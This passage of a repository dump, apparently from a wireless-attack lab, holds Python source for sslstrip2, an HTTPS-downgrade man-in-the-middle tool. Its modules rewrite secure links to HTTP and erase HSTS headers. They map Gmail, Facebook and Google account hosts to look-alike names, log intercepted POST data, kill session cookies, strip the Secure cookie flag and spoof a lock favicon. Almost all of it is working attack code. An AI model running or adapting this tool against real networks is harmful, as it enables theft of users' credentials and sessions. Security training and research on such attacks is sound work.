self.command = command 42 | self.uri = uri 43 | self.postData = postData 44 | self.headers = headers 45 | self.client = client 46 | self.urlMonitor = URLMonitor.getInstance() 47 | self.isImageRequest = False 48 | self.isCompressed = False 49 | self.contentLength = None 50 | self.shutdownComplete = False 51 | 52 | def getLogLevel(self): 53 | return logging.DEBUG 
54 | 55 | def getPostPrefix(self): 56 | return "POST" 57 | 58 | def sendRequest(self): 59 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 60 | self.sendCommand(self.command, self.uri) 61 | 62 | def sendHeaders(self): 63 | for header, value in self.headers.items(): 64 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 65 | self.sendHeader(header, value) 66 | 67 | self.endHeaders() 68 | 69 | def sendPostData(self): 70 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 71 | self.transport.write(self.postData) 72 | 73 | def connectionMade(self): 74 | logging.log(self.getLogLevel(), "HTTP connection made.") 75 | self.sendRequest() 76 | self.sendHeaders() 77 | 78 | if (self.command == 'POST'): 79 | self.sendPostData() 80 | 81 | def handleStatus(self, version, code, message): 82 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 83 | self.client.setResponseCode(int(code), message) 84 | 85 | def handleHeader(self, key, value): 86 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 87 | 88 | if (key.lower() == 'location'): 89 | value = self.replaceSecureLinks(value) 90 | 91 | if (key.lower() == 'content-type'): 92 | if (value.find('image') != -1): 93 | self.isImageRequest = True 94 | logging.debug("Response is image content, not scanning...") 95 | 96 | if (key.lower() == 'content-encoding'): 97 | if (value.find('gzip') != -1): 98 | logging.debug("Response is compressed...") 99 | self.isCompressed = True 100 | elif (key.lower() == 'content-length'): 101 | self.contentLength = value 102 | elif (key.lower() == 'set-cookie'): 103 | self.client.responseHeaders.addRawHeader(key, value) 104 | elif (key.lower()== 'strict-transport-security'): 105 | logging.log(self.getLogLevel(), "LEO Erasing Strict Transport Security....") 106 | else: 107 | self.client.setHeader(key, value) 108 | 109 | 110 | def 
handleEndHeaders(self): 111 | if (self.isImageRequest and self.contentLength != None): 112 | self.client.setHeader("Content-Length", self.contentLength) 113 | 114 | if self.length == 0: 115 | self.shutdown() 116 | 117 | def handleResponsePart(self, data): 118 | if (self.isImageRequest): 119 | self.client.write(data) 120 | else: 121 | HTTPClient.handleResponsePart(self, data) 122 | 123 | def handleResponseEnd(self): 124 | if (self.isImageRequest): 125 | self.shutdown() 126 | else: 127 | HTTPClient.handleResponseEnd(self) 128 | 129 | def handleResponse(self, data): 130 | if (self.isCompressed): 131 | logging.debug("Decompressing content...") 132 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 133 | 134 | logging.log(self.getLogLevel(), "Read from server:\n" + data) 135 | #logging.log(self.getLogLevel(), "Read from server:\n " ) 136 | 137 | 138 | data = self.replaceSecureLinks(data) 139 | 140 | if (self.contentLength != None): 141 | self.client.setHeader('Content-Length', len(data)) 142 | 143 | self.client.write(data) 144 | self.shutdown() 145 | 146 | def replaceSecureLinks(self, data): 147 | sustitucion = {} 148 | patchDict = self.urlMonitor.patchDict 149 | if len(patchDict)>0: 150 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 151 | data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) 152 | 153 | iterator = re.finditer(ServerConnection.urlExpression, data) 154 | for match in iterator: 155 | url = match.group() 156 | 157 | logging.debug("Found secure reference: " + url) 158 | nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 159 | logging.debug("LEO replacing %s => %s"%(url,nuevaurl)) 160 | sustitucion[url] = nuevaurl 161 | #data.replace(url,nuevaurl) 162 | 163 | #data = self.urlMonitor.DataReemplazo(data) 164 | if len(sustitucion)>0: 165 | dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) 166 | data = dregex.sub(lambda x: 
str(sustitucion[x.string[x.start() :x.end()]]), data) 167 | 168 | #logging.debug("LEO DEBUG received data:\n"+data) 169 | #data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data) 170 | #data = re.sub(ServerConnection.urlTypewww, 'http://w', data) 171 | #if data.find("http://w.face")!=-1: 172 | # logging.debug("LEO DEBUG Found error in modifications") 173 | # raw_input("Press Enter to continue") 174 | #return re.sub(ServerConnection.urlType, 'http://web.', data) 175 | return data 176 | 177 | 178 | def shutdown(self): 179 | if not self.shutdownComplete: 180 | self.shutdownComplete = True 181 | self.client.finish() 182 | self.transport.loseConnection() 183 | 184 | 185 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 
12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 
12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # URLMonitor 2 | 3 | import re 4 | import logging 5 | 6 | class URLMonitor: 7 | 8 | ''' 9 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 10 | server is expecting over SSL. It also keeps track of secure favicon urls. 11 | ''' 12 | 13 | # Start the arms race, and end up here... 
14 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 15 | _instance = None 16 | sustitucion = {} # LEO: diccionario host / sustitucion 17 | real = {} # LEO: diccionario host / real 18 | patchDict = { 19 | 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 20 | 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', 21 | 'return"https:"':'return"http:"' 22 | } 23 | 24 | def __init__(self): 25 | self.strippedURLs = set() 26 | self.strippedURLPorts = {} 27 | self.faviconReplacement = False 28 | 29 | self.sustitucion["mail.google.com"] = "gmail.google.com" 30 | self.real["gmail.google.com"] = "mail.google.com" 31 | 32 | self.sustitucion["www.facebook.com"] = "social.facebook.com" 33 | self.real["social.facebook.com"] = "www.facebook.com" 34 | 35 | self.sustitucion["accounts.google.com"] = "cuentas.google.com" 36 | self.real["cuentas.google.com"] = "accounts.google.com" 37 | 38 | self.sustitucion["accounts.google.es"] = "cuentas.google.es" 39 | self.real["cuentas.google.es"] = "accounts.google.es" 40 | 41 | def isSecureLink(self, client, url): 42 | for expression in URLMonitor.javascriptTrickery: 43 | if (re.match(expression, url)): 44 | return True 45 | 46 | return (client,url) in self.strippedURLs 47 | 48 | def getSecurePort(self, client, url): 49 | if (client,url) in self.strippedURLs: 50 | return self.strippedURLPorts[(client,url)] 51 | else: 52 | return 443 53 | 54 | def addSecureLink(self, client, url): 55 | methodIndex = url.find("//") + 2 56 | method = url[0:methodIndex] 57 | pathIndex = url.find("/", methodIndex) 58 | host = url[methodIndex:pathIndex].lower() 59 | path = url[pathIndex:] 60 | 61 | port = 443 62 | portIndex = host.find(":") 63 | 64 | if (portIndex != -1): 65 | host = host[0:portIndex] 66 | port = host[portIndex+1:] 67 | if len(port) == 0: 68 | port = 443 69 | 70 | #LEO: Sustituir HOST 71 | if not self.sustitucion.has_key(host): 72 | lhost = host[:4] 73 | if 
lhost=="www.": 74 | self.sustitucion[host] = "w"+host 75 | self.real["w"+host] = host 76 | else: 77 | self.sustitucion[host] = "web"+host 78 | self.real["web"+host] = host 79 | logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) 80 | 81 | url = 'http://' + host + path 82 | #logging.debug("LEO stripped URL: %s %s"%(client, url)) 83 | 84 | self.strippedURLs.add((client, url)) 85 | self.strippedURLPorts[(client, url)] = int(port) 86 | return 'http://'+self.sustitucion[host]+path 87 | 88 | def setFaviconSpoofing(self, faviconSpoofing): 89 | self.faviconSpoofing = faviconSpoofing 90 | 91 | def isFaviconSpoofing(self): 92 | return self.faviconSpoofing 93 | 94 | def isSecureFavicon(self, client, url): 95 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 96 | 97 | def URLgetRealHost(self,host): 98 | logging.debug("Parsing host: %s"%host) 99 | if self.real.has_key(host): 100 | logging.debug("New host: %s"%self.real[host]) 101 | return self.real[host] 102 | else: 103 | logging.debug("New host: %s"%host) 104 | return host 105 | 106 | def getInstance(): 107 | if URLMonitor._instance == None: 108 | URLMonitor._instance = URLMonitor() 109 | 110 | return URLMonitor._instance 111 | 112 | getInstance = staticmethod(getInstance) 113 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/__init__.py -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free 
software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 
43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'if-modified-since' in headers: 60 | del headers['if-modified-since'] 61 | 62 | if 'cache-control' in headers: 63 | del headers['cache-control'] 64 | 65 | return headers 66 | 67 | def getPathFromUri(self): 68 | if (self.uri.find("http://") == 0): 69 | index = self.uri.find('/', 7) 70 | return self.uri[index:] 71 | 72 | return self.uri 73 | 74 | def getPathToLockIcon(self): 75 | if os.path.exists("lock.ico"): return "lock.ico" 76 | 77 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 78 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 79 | 80 | if os.path.exists(scriptPath): return scriptPath 81 | 82 | logging.warning("Error: Could not find lock.ico") 83 | return "lock.ico" 84 | 85 | def handleHostResolvedSuccess(self, address): 86 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 87 | lhost = self.getHeader("host").lower() 88 | host = self.urlMonitor.URLgetRealHost(lhost) 89 | headers = self.cleanHeaders() 90 | client = self.getClientIP() 91 | path = self.getPathFromUri() 92 | 93 | self.content.seek(0,0) 94 | postData = self.content.read() 95 | url = 'http://' + host + path 96 | 97 | self.dnsCache.cacheResolution(host, address) 98 | 99 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 100 | logging.debug("Sending expired cookies...") 101 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 102 | host, headers, path)) 
103 | elif (self.urlMonitor.isSecureFavicon(client, path)): 104 | logging.debug("Sending spoofed favicon response...") 105 | self.sendSpoofedFaviconResponse() 106 | elif (self.urlMonitor.isSecureLink(client, url)): 107 | logging.debug("Sending request via SSL...") 108 | self.proxyViaSSL(address, self.method, path, postData, headers, 109 | self.urlMonitor.getSecurePort(client, url)) 110 | else: 111 | logging.debug("Sending request via HTTP...") 112 | self.proxyViaHTTP(address, self.method, path, postData, headers) 113 | 114 | def handleHostResolvedError(self, error): 115 | logging.warning("Host resolution error: " + str(error)) 116 | self.finish() 117 | 118 | def resolveHost(self, host): 119 | address = self.dnsCache.getCachedAddress(host) 120 | 121 | if address != None: 122 | logging.debug("Host cached.") 123 | return defer.succeed(address) 124 | else: 125 | logging.debug("Host not cached.") 126 | return reactor.resolve(host) 127 | 128 | def process(self): 129 | logging.debug("Resolving host: %s" % (self.getHeader('host'))) 130 | host = self.getHeader('host') 131 | deferred = self.resolveHost(host) 132 | 133 | deferred.addCallback(self.handleHostResolvedSuccess) 134 | deferred.addErrback(self.handleHostResolvedError) 135 | 136 | def proxyViaHTTP(self, host, method, path, postData, headers): 137 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 138 | connectionFactory.protocol = ServerConnection 139 | self.reactor.connectTCP(host, 80, connectionFactory) 140 | 141 | def proxyViaSSL(self, host, method, path, postData, headers, port): 142 | clientContextFactory = ssl.ClientContextFactory() 143 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 144 | connectionFactory.protocol = SSLServerConnection 145 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 146 | 147 | def sendExpiredCookies(self, host, path, expireHeaders): 148 | self.setResponseCode(302, "Moved") 149 | 
self.setHeader("Connection", "close") 150 | self.setHeader("Location", "http://" + host + path) 151 | 152 | for header in expireHeaders: 153 | self.setHeader("Set-Cookie", header) 154 | 155 | self.finish() 156 | 157 | def sendSpoofedFaviconResponse(self): 158 | icoFile = open(self.getPathToLockIcon()) 159 | 160 | self.setResponseCode(200, "OK") 161 | self.setHeader("Content-type", "image/x-icon") 162 | self.write(icoFile.read()) 163 | 164 | icoFile.close() 165 | self.finish() 166 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 
27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 
| expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 
6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 
29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 49 | 50 | ServerConnection.handleHeader(self, key, value) 51 | 52 | def stripFileFromPath(self, path): 53 | (strippedPath, lastSlash, file) = path.rpartition('/') 54 | return strippedPath 55 | 56 | def buildAbsoluteLink(self, link): 57 | absoluteLink = "" 58 | 59 | if ((not link.startswith('http')) and (not link.startswith('/'))): 60 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 61 | 62 | logging.debug("Found path-relative link in secure transmission: " + link) 63 | logging.debug("New Absolute path-relative link: " + absoluteLink) 64 | elif not link.startswith('http'): 65 | absoluteLink = "http://"+self.headers['host']+link 66 | 67 | logging.debug("Found relative link in secure transmission: " + link) 68 | logging.debug("New Absolute link: " + absoluteLink) 69 | 70 | if not absoluteLink == "": 71 | absoluteLink = absoluteLink.replace('&', '&') 72 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 73 | 74 | def replaceCssLinks(self, data): 75 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 76 | 77 | for match in iterator: 78 | 
self.buildAbsoluteLink(match.group(1)) 79 | 80 | return data 81 | 82 | def replaceFavicon(self, data): 83 | match = re.search(SSLServerConnection.iconExpression, data) 84 | 85 | if (match != None): 86 | data = re.sub(SSLServerConnection.iconExpression, 87 | "", data) 88 | else: 89 | data = re.sub(SSLServerConnection.headExpression, 90 | "", data) 91 | 92 | return data 93 | 94 | def replaceSecureLinks(self, data): 95 | data = ServerConnection.replaceSecureLinks(self, data) 96 | data = self.replaceCssLinks(data) 97 | 98 | if (self.urlMonitor.isFaviconSpoofing()): 99 | data = self.replaceFavicon(data) 100 | 101 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 102 | 103 | for match in iterator: 104 | self.buildAbsoluteLink(match.group(10)) 105 | 106 | return data 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 
12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 34 | urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) 35 | urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) 36 | # urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) 37 | 38 | def __init__(self, command, uri, postData, headers, client): 39 | self.command = command 40 | self.uri = uri 41 | self.postData = postData 42 | self.headers = headers 43 | self.client = client 44 | self.urlMonitor = URLMonitor.getInstance() 45 | self.isImageRequest = False 46 | self.isCompressed = False 47 | self.contentLength = None 48 | self.shutdownComplete = False 49 | 50 | def getLogLevel(self): 51 | return logging.DEBUG 52 | 53 | def getPostPrefix(self): 54 | return "POST" 55 | 56 | def sendRequest(self): 57 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 58 | self.sendCommand(self.command, self.uri) 59 | 60 | def sendHeaders(self): 61 | for header, value in self.headers.items(): 62 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 63 | self.sendHeader(header, 
value) 64 | 65 | self.endHeaders() 66 | 67 | def sendPostData(self): 68 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 69 | self.transport.write(self.postData) 70 | 71 | def connectionMade(self): 72 | logging.log(self.getLogLevel(), "HTTP connection made.") 73 | self.sendRequest() 74 | self.sendHeaders() 75 | 76 | if (self.command == 'POST'): 77 | self.sendPostData() 78 | 79 | def handleStatus(self, version, code, message): 80 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 81 | self.client.setResponseCode(int(code), message) 82 | 83 | def handleHeader(self, key, value): 84 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 85 | 86 | if (key.lower() == 'location'): 87 | value = self.replaceSecureLinks(value) 88 | 89 | if (key.lower() == 'content-type'): 90 | if (value.find('image') != -1): 91 | self.isImageRequest = True 92 | logging.debug("Response is image content, not scanning...") 93 | 94 | if (key.lower() == 'content-encoding'): 95 | if (value.find('gzip') != -1): 96 | logging.debug("Response is compressed...") 97 | self.isCompressed = True 98 | elif (key.lower() == 'content-length'): 99 | self.contentLength = value 100 | elif (key.lower() == 'set-cookie'): 101 | self.client.responseHeaders.addRawHeader(key, value) 102 | else: 103 | self.client.setHeader(key, value) 104 | 105 | def handleEndHeaders(self): 106 | if (self.isImageRequest and self.contentLength != None): 107 | self.client.setHeader("Content-Length", self.contentLength) 108 | 109 | if self.length == 0: 110 | self.shutdown() 111 | 112 | def handleResponsePart(self, data): 113 | if (self.isImageRequest): 114 | self.client.write(data) 115 | else: 116 | HTTPClient.handleResponsePart(self, data) 117 | 118 | def handleResponseEnd(self): 119 | if (self.isImageRequest): 120 | 